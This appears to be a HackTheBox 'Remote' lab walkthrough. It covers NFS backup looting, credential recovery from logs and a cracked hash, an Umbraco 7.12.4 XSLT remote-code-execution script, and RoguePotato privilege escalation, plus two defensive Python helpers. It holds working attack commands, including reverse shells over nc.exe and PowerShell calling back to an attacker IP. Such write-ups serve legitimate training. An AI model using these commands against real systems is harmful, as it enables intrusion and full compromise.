Remote | HackTheBox | Walkthrough | OSCP Preparation

medium.com · SilentExploit · 4 days ago · tutorial
Remote | HackTheBox | Walkthrough | OSCP Preparation

SilentExploit · ~9 min read · April 8, 2026 (Updated: April 9, 2026)

Start off by setting our target machine's IP as an environment variable ($target): this saves us having to constantly input the IP.

┌──(venv)─(root㉿user)-[/tmp]
└─# export target=10.129.15.208

┌──(venv)─(root㉿user)-[/tmp]
└─# ping $target
PING 10.129.15.208 (10.129.15.208) 56(84) bytes of data.
64 bytes from 10.129.15.208: icmp_seq=1 ttl=127 time=162 ms
64 bytes from 10.129.15.208: icmp_seq=2 ttl=127 time=117 ms

Then, we perform an nmap scan of the target (the third scan uses the vuln script category, which nmap spells --script vuln):

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln -T4

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr     1-4 (RPC #100021)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The above output is heavily snipped / consolidated; your output will be much larger than this. Two things that should instantly catch your attention:

- anonymous FTP login / access on port 21
- NFS share mounts on port 2049 / 111

The FTP share was empty so I moved straight onto mounting the NFS shares:

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# showmount -e $target
Export list for 10.129.230.172:
/site_backups (everyone

We can see from the above output that we have a share on the target called site_backups. I am going to make a new directory called NFS on my Kali machine and mount the contents of site_backups:

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# mkdir NFS

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# mount -t nfs $target:/ ./NFS/ -o nolock

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# cd NFS

┌──(root㉿user)-[/run/…/2024/HTBox/remote/NFS]
└─# ls
site_backups

This folder basically contains a backup of the site we find on port 80. Whilst trawling through it you can note some interesting information about the architecture of the site: it uses Umbraco. Umbraco is an open-source, flexible Content Management System (CMS) built on Microsoft .NET. I have a bash command that I run in my terminal to look for any references to potential credentials; this can get messy and often flags irrelevant material (we will get to this below).

┌──(root㉿user)-[/run/…/HTBox/remote/NFS/site_backups]
└─# grep -rIE "password|pwd|connectionstring|user id|token" .
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:58:20,012 [P3592/D3/T25] WARN Umbraco.Web.Editors.PasswordChanger - Could not change user password Passwords must be at least 10 characters.
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19:[passwordConfig] NVARCHAR(500) NULL,
^C

I noted we had this log, UmbracoTraceLog.intranet.txt, so I began manually inspecting it. If you look through the log you will find 'Login attempt failed for username Umbracoadmin123!!'; this is obviously a password. I noted this as a potential credential for [email protected]. I also noted there was an additional username listed (line 221): ssmith.

At this point I used ffuf to enumerate subdirectories and find the login page for Umbraco.

┌──(root㉿user)-[/run/…/user/2024/HTBox/remote]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -u http://$target/FUZZ --recursion-depth=1

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.230.172/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

contact                 [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 658ms]
install                 [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 578ms]
blog                    [Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 1691ms]
home                    [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 982ms]
products                [Status: 200, Size: 5338, Words: 1307, Lines: 130, Duration: 197ms]
product                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 1515ms]
intranet                [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 792ms]
Install                 [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 737ms]
Home                    [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 351ms]
about-us                [Status: 200, Size: 5451, Words: 1232, Lines: 162, Duration: 695ms]
people                  [Status: 200, Size: 6749, Words: 2109, Lines: 168, Duration: 1347ms]
umbraco                 [Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 520ms]
Products                [Status: 200, Size: 5338, Words: 1307, Lines: 130, Duration: 212ms]
Blog                    [Status: 200, Size: 5011, Words: 1249, Lines: 138, Duration: 335ms]
master                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 290ms]
Product                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 208ms]
Contact                 [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 275ms]
INSTALL                 [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 491ms]
person                  [Status: 200, Size: 2741, Words: 503, Lines: 82, Duration: 2876ms]
Master                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 256ms]
Intranet                [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 128ms]
People                  [Status: 200, Size: 6739, Words: 2109, Lines: 168, Duration: 280ms]
Person                  [Status: 200, Size: 2741, Words: 503, Lines: 82, Duration: 407ms]
                        [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 295ms]
HOME                    [Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 271ms]

I manually trawled through the directories to see whether we could land on a login page and found that http://10.129.230.172/install redirects us to the login page http://10.129.230.172/umbraco/#/login

I was initially hopeful that the credentials for ssmith or admin would work to authenticate, but they did not. I tried many variations, e.g. appending the domain htb.local, but this was to no avail. As we have the site_backup we needed to go back and enumerate HARDER; the grep command I used earlier was just a basic guide and you can't expect it to find all the credentials automatically.
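A scanner like the one below, added here as an example and not part of the original write-up or any tool it uses, walks an unpacked backup the way the grep above does but keeps only lines that look like a credential assignment, a connection string or a credential in a failed-login log entry, and separately lists binary stores such as Umbraco.sdf that grep -I skips and that need strings or a database viewer. The directory layout and log lines it scans are constructed for the demo; the same check is useful for auditing a backup before it is exported on a share.

```python
import os
import re
import tempfile

# Credential-shaped patterns, checked in this order (constructed list; extend as needed).
PATTERNS = {
    "connstring": re.compile(r"(?i)user id=.*password=|connectionstring"),
    "login_attempt": re.compile(r"(?i)login attempt failed for username\s+\S+"),
    "password_kv": re.compile(r"(?i)\b(password|pwd|passwd)\s*[=:]\s*\S+"),
}
# Binary stores that grep -I skips but that still hold hashes or credentials (Umbraco.sdf is one).
BINARY_STORES = (".sdf", ".mdf", ".sqlite", ".db")

def scan_text(text: str, source: str) -> list:
    """One hit per line that matches a pattern; the first matching rule names the hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            if rx.search(line):
                hits.append({"source": source, "line": lineno, "rule": rule, "text": line.strip()})
                break
    return hits

def scan_tree(root: str) -> dict:
    """Walk an unpacked backup: scan text files, list binary stores for manual follow-up."""
    report = {"hits": [], "binary_stores": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower().endswith(BINARY_STORES):
                report["binary_stores"].append(rel)
                continue
            with open(path, encoding="utf-8", errors="ignore") as fh:
                report["hits"].extend(scan_text(fh.read(), rel))
    return report

def demo() -> dict:
    """Build a constructed mini-backup (not the box's real files) and scan it."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "App_Data", "Logs")
    os.makedirs(logs)
    with open(os.path.join(logs, "UmbracoTraceLog.txt"), "w") as fh:
        fh.write("2020-02-20 00:58:20 WARN PasswordChanger - Could not change user password\n"
                 "2020-02-20 00:58:21 WARN Login attempt failed for username Sample123!!\n")
    with open(os.path.join(root, "web.config"), "w") as fh:
        fh.write('<add name="db" connectionString="Data Source=x;User Id=sa;Password=example" />\n')
    with open(os.path.join(root, "App_Data", "Umbraco.sdf"), "wb") as fh:
        fh.write(b"\x00constructed binary placeholder")
    return scan_tree(root)
```

The first log line (the "Passwords must be at least 10 characters" noise that the plain grep flagged) produces no hit, while the failed-login line and the connection string do.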
There was a file called Umbraco.sdf: in Umbraco, a .sdf file is a database file used by Microsoft SQL Server Compact Edition (SQLCE). It acts as a lightweight, "portable" database that stores all the content, media references, and configuration settings. I ran the file through strings and saved the output to /tmp/strings, which I then examined.

This output can be somewhat intimidating. I manually went through and checked the hashes against CrackStation (I would use hashcat if stuck) and we had a successful hit with the admin hash:

[email protected] baconandcheese

If we test this login against the Umbraco login page (discovered above) we should have a successful login.

Important note: my lab actually broke at this point. When I used the aforementioned (correct) login the page would just load blankly. I had this happen in the CWES exam by HackTheBox and it very nearly cost me the exam, so remember: if the box is behaving oddly (not rejecting the credential but just pausing, or the page coming back empty) then RESET THE BOX.

Once logged into the Umbraco dashboard we can see that the version is 7.12.4 (version pictured in the top left corner).

It was rather easy to find this exploit; it uses the XSLT Visualizer, a developer tool in the Umbraco backoffice, to execute arbitrary C# code. I had some trouble getting the dependencies for this script (particularly beautifulsoup) to run coherently; the solution was to search on GitHub. I found a bash script that we could use to obtain our initial shell. Below is the command log showing how to make the script executable in Linux (using chmod) and then an example of how to use it correctly:

┌──(venv)─(root㉿user)-[/tmp]
└─# chmod +x Umbrac-CMS-XSLT-RCE

┌──(venv)─(root㉿user)-[/tmp]
└─# ./Umbrac-CMS-XSLT-RCE [email protected] baconandcheese http://10.129.15.208/ "whoami"
[*] Checking and installing required dependencies...
[*] Step 1 - Logging in...
[+] Login successful!
[*] Step 2 - Accessing XSLT Visualize page...
[+] Successfully fetched tokens.
[*] Step 3 - Sending malicious payload...
[+] Payload executed successfully.

Command Output:
iis apppool\defaultapppool

[*] Exploit completed.

We can see that we get successful feedback as the user iis apppool\defaultapppool when we execute the command 'whoami'. As is often the case with easy boxes on HTB, I refer to revshells to replace this command with a base64 encoded PowerShell reverse shell command.

┌──(venv)─(root㉿user)-[/tmp]
└─# ./Umbrac-CMS-XSLT-RCE [email protected] baconandcheese http://10.129.15.208/ "powershell -e <base64-encoded PowerShell reverse shell generated on revshells; blob omitted here>"
[*] Checking and installing required dependencies...
[*] Step 1 - Logging in...
[+] Login successful!
[*] Step 2 - Accessing XSLT Visualize page...
[+] Successfully fetched tokens.
[*] Step 3 - Sending malicious payload...

┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.93] from (UNKNOWN) [10.129.15.208] 49697
whoami
iis apppool\defaultapppool

Privilege Escalation

I always start off by checking what privileges the user has on the machine, and we can see we have the powerful SeImpersonatePrivilege:

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If you ever land on a Windows box with SeImpersonatePrivilege you should instantly think of Potato attacks. We run systeminfo to confirm our version of Windows:

C:\Users\Public\Desktop>systeminfo
systeminfo

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763

There are reference tables showing which Potato attack to use for which Windows version; RoguePotato will be our choice due to our target being Microsoft Windows Server 2019 Standard. RoguePotato is a privilege escalation tool that tricks a high-privileged system service into authenticating against a fake "resolver" controlled / hosted by us. By intercepting this connection, the tool captures a SYSTEM token and uses SeImpersonatePrivilege to launch a new process with administrative rights.
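The triage below, an added example that is not from the original post, parses whoami /priv and systeminfo output shaped after what is shown above and reports which impersonation-class privileges the token holds together with the OS build; the sample text is constructed. A privilege listed as Disabled is still held by the token (the state only says whether it is currently switched on, and the process can switch it on itself), so both states are reported rather than only Enabled ones.

```python
import re
from typing import Dict, Optional

# Privileges whose presence on a service token is the precondition for the
# token-impersonation (Potato) family. Constructed list for this example.
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed samples shaped after the whoami /priv and systeminfo output above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""
SAMPLE_SYSTEMINFO = """\
Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)$")
BUILD_LINE = re.compile(r"^OS Version:\s+(\d+)\.(\d+)\.(\d+)", re.M)

def parse_privileges(output: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled' from whoami /priv text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def impersonation_exposure(output: str) -> Dict[str, str]:
    """Impersonation-class privileges the token holds, with their current state."""
    privs = parse_privileges(output)
    return {p: privs[p] for p in IMPERSONATION_PRIVS if p in privs}

def os_build(systeminfo: str) -> Optional[int]:
    """Windows build number from systeminfo, e.g. 17763 for Server 2019."""
    m = BUILD_LINE.search(systeminfo)
    return int(m.group(3)) if m else None

def triage(whoami_priv: str, systeminfo: str) -> dict:
    """What a defender or tester should notice first after landing on the host."""
    exposure = impersonation_exposure(whoami_priv)
    return {"build": os_build(systeminfo), "impersonation_privs": exposure,
            "potato_relevant": bool(exposure)}
```

From a hardening angle the same parser run against a service account's token tells you whether the application pool identity really needs SeImpersonatePrivilege, which is the setting that makes this whole escalation possible.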
Firstly, we need to transfer RoguePotato.exe to the victim machine.

┌──(root㉿user)-[/run/…/HTBox/tools/Win-Potato/RoguePotato]
└─# ls
RogueOxidResolver.exe  RoguePotato.exe

(I won't demonstrate this as file transfers can be done in many different ways; the CPTS has an extensive module on transfers.)

Secondly, we run a socat command on Kali, setting up a "relay" or "bridge"; make sure to run this in the same directory as RogueOxidResolver.exe.

┌──(root㉿user)-[/run/…/2024/HTBox/Tools/Win-Potato/RoguePotato]
└─# socat tcp-listen:135,reuseaddr,fork tcp:10.129.15.208:9999
2026/04/08 14:06:26 socat[1119408] E read(5, 0x55f473dc3000, 8192): Connection reset by peer
2026/04/08 14:06:26 socat[1119399] E read(5, 0x55f473dc3000, 8192): Connection reset by peer

Thirdly, transfer a copy of netcat (nc.exe) onto the target from Kali. Make sure you work from a directory where the user can write on the target (C:\windows\temp or the user's Desktop are usually good options). As soon as you run the command below on Windows, the SYSTEM service will hit your Kali port 135, socat will forward it back to the Windows port 9999, RoguePotato will catch it, and you'll get your shell on your listening port (443 in this case). RoguePotato's -r takes the address of your relay (the Kali IP, 10.10.15.93 here) and nc.exe needs the same address to call back to.

┌──(venv)─(root㉿user)-[/tmp]
└─# rlwrap nc -lvnp 443
listening on [any] 443 ...

.\RoguePotato.exe -r 10.10.15.93 -e "C:\windows\temp\nc.exe 10.10.15.93 443 -e cmd" -l 9999

You should now have a shell as SYSTEM (the Windows equivalent of the root user). Thanks for reading.

#bug-bounty #hacking #ethical-hacking #tech #technology